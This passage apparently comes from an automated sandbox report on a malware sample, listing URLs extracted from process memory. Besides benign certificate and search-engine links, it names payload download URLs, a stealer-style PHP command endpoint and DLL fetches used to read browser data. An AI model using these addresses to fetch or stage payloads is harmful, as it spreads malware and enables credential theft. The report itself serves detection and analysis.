Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dll
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dll?Q
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.0000000001197000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dll
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.0000000001197000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dll?LB
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dll
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dllNC
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.0000000001197000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php3
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php;
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php?
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.0000000001197000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpAKJEHDBGHIEBGCGDG
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.0000000001197000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpAKJEHDBGHIEBGCGDGPI
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpC
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpD
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpE
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpG
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpS
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php_
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpfW
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpk
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpl
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phprowser
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000567000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpser
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.0000000001182000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpvzm
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.0000000001197000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpyH
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000567000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115c4becf79229cb002.phpser
Source: powershell.exe, 00000011.00000002.2291479867.0000000004876000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2376488444.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2467393539.000000000546F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16
Source: random.exe, 00000000.00000003.1848415216.0000000001932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: powershell.exe, 00000033.00000002.3126341896.0000022695EE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/defend/random.exe
Source: powershell.exe, 00000048.00000002.2602223292.000001E8A7C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: random.exe, 00000000.00000003.1848910917.00000000018D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exed
Source: random.exe, 00000000.00000003.1848415216.0000000001932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: random.exe, 00000000.00000003.1848910917.00000000018B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/mine/random.exe
Source: random.exe, 00000000.00000003.1848910917.00000000018B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/steam/random.exe08
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/Cyber_Yoda/random.exeH
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/Cyber_Yoda/random.exeT
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/LostRobotic/random.exe
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/LostRobotic/random.exeF
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/ReverseSheller/random.exe
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/ReverseSheller/random.exe?
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/asjduwgsgausi/random.exe
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/asjduwgsgausi/random.exe$i
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/asjduwgsgausi/random.exe1ee3
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/asjduwgsgausi/random.exeE
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/asjduwgsgausi/random.exeF
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/asjduwgsgausi/random.exee
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/fate/random.exe
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/fate/random.exe5
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: random.exe, 00000000.00000003.1728093597.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: random.exe, 00000000.00000003.1728093597.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000011.00000002.2313081100.0000000006FA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: random.exe, 00000000.00000003.1728093597.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: random.exe, 00000000.00000003.1728093597.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: random.exe, 00000000.00000003.1728093597.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: random.exe, 00000000.00000003.1728093597.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: random.exe, 00000000.00000003.1728093597.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDC68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDC68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDC68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDC68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDC68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDC68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDC9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDCE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000025.00000002.2372180560.0000000002F3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000025.00000002.2372180560.0000000002F3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.ce
Source: b33114b970.exe, 00000041.00000002.2518623469.0000000000409000.00000002.00000001.01000000.0000001C.sdmp, b33114b970.exe, 00000041.00000000.2507789716.0000000000409000.00000002.00000001.01000000.0000001C.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000011.00000002.2301752007.0000000005784000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2396659224.0000000006366000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2511922304.0000000006297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000048.00000002.2607393831.000001E8AB25B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: random.exe, 00000000.00000003.1728093597.0000000006137000.00000004.00000800.00020000.00000000.sdmp, skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: random.exe, 00000000.00000003.1728093597.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 0000002F.00000002.2467393539.0000000005381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.2291479867.0000000004721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2432141103.000001F3947A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2376488444.0000000005301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2366960510.000002625FDD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2467393539.0000000005231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000002F.00000002.2467393539.0000000005381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: skotes.exe, 0000000B.00000003.2717238182.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196397263.000000006F8ED000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2195871639.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2190370013.0000000005A60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: random.exe, 00000000.00000003.1728093597.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: random.exe, 00000000.00000003.1728093597.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: random.exe, 00000000.00000003.1700254862.000000000614A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1700191024.000000000614D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000014.00000002.2432141103.000001F3947A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2366960510.000002625FDD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000011.00000002.2291479867.0000000004721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2376488444.0000000005301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2467393539.0000000005231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: random.exe, 00000000.00000003.1729506302.0000000006105000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2192886657.000000000BA83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: random.exe, 00000000.00000003.1729506302.0000000006105000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2192886657.000000000BA83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: random.exe, 00000000.00000003.1700254862.000000000614A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1700191024.000000000614D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: random.exe, 00000000.00000003.1700254862.000000000614A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1700191024.000000000614D000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: random.exe, 00000000.00000003.1700254862.000000000614A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1700191024.000000000614D000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: random.exe, 00000000.00000003.1729506302.0000000006105000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2192886657.000000000BA83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: random.exe, 00000000.00000003.1729506302.0000000006105000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2192886657.000000000BA83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000048.00000002.2607393831.000001E8AB25B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000048.00000002.2607393831.000001E8AB25B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000048.00000002.2607393831.000001E8AB25B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: f2d6093d56.exe, 00000035.00000002.2872867259.0000000000F74000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://developers.google.com/protocol-buffers/docs/reference/go/faq#namespace-conflictinvalid
Source: random.exe, 00000000.00000003.1700254862.000000000614A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1700191024.000000000614D000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: random.exe, 00000000.00000003.1700254862.000000000614A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1700191024.000000000614D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: random.exe, 00000000.00000003.1700254862.000000000614A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1700191024.000000000614D000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDD12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDCC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDD12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDCF3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1935347945.0000017ACDD38000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1935347945.0000017ACDD44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDD12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 0000002F.00000002.2467393539.0000000005381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.2291479867.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2376488444.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2366960510.00000262609FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2467393539.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: random.exe, 00000000.00000003.1848910917.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1807123432.0000000006114000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744234520.0000000006106000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1729506302.0000000006108000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728080357.0000000006108000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1758980960.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1727720813.0000000006105000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744416978.0000000006107000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1758871098.0000000006111000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728254495.0000000006108000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1806979277.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1727694765.0000000006101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/
Source: random.exe, 00000000.00000003.1848910917.00000000018D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/AL
Source: random.exe, 00000000.00000003.1699159124.00000000018EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/SuA
Source: random.exe, 00000000.00000003.1758980960.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1806979277.00000000018D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/UniverNNy
Source: random.exe, 00000000.00000003.1744234520.0000000006106000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744416978.0000000006107000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/an
Source: random.exe, random.exe, 00000000.00000003.1745108911.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744946033.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1746883697.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744565809.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1745802556.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1727931221.0000000001948000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744719046.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1762606937.0000000001948000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744296256.0000000001948000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744829290.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744778543.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1745724854.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1758904266.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1746107353.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1745605640.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1747388340.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1769022616.0000000001947000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1747125925.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1699159124.00000000018EF000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1746456827.0000000001949000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 